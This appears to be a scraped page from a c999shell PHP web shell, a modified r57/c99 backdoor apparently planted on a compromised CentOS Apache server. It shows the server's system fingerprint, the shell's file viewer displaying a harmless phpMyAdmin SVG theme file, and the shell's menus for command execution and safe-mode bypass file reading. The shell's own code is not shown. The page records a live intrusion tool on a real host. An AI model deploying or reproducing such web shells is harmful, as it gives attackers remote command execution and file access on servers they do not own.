Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/themes/ drwxr-xr-x |
Viewing file: Select action/file-type: <?php header('Content-Type: image/svg+xml'); header('Expires: ' . gmdate('D, d M Y H:i:s', time() + 3600) . ' GMT'); function get_color($get_name, $default) { // get color from GET args, only alphanumeric chcracters $opts = array('options' => array('regexp' => '/^[a-z0-9]+$/i')); $color = filter_input(INPUT_GET, $get_name, FILTER_VALIDATE_REGEXP, $opts); if (preg_match('/^[a-f0-9]{6}$/', $color)) { return '#' . $color; } return $color ? $color : $default; } ?> <?php echo '<?xml version="1.0" ?>' ?> <svg xmlns="http://www.w3.org/2000/svg" preserveAspectRatio="none" version="1.0" width="100%" height="100%"> <defs> <linearGradient id="linear-gradient" x1="0%" y1="0%" x2="0%" y2="100%"> <stop offset="0%" stop-color="<?php echo get_color('from', 'white') ?>" stop-opacity="1" /> <stop offset="100%" stop-color="<?php echo get_color('to', 'black') ?>" stop-opacity="1" /> </linearGradient> </defs> <rect width="100%" height="100%" style="fill:url(#linear-gradient);" /> </svg> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0052 ]-- |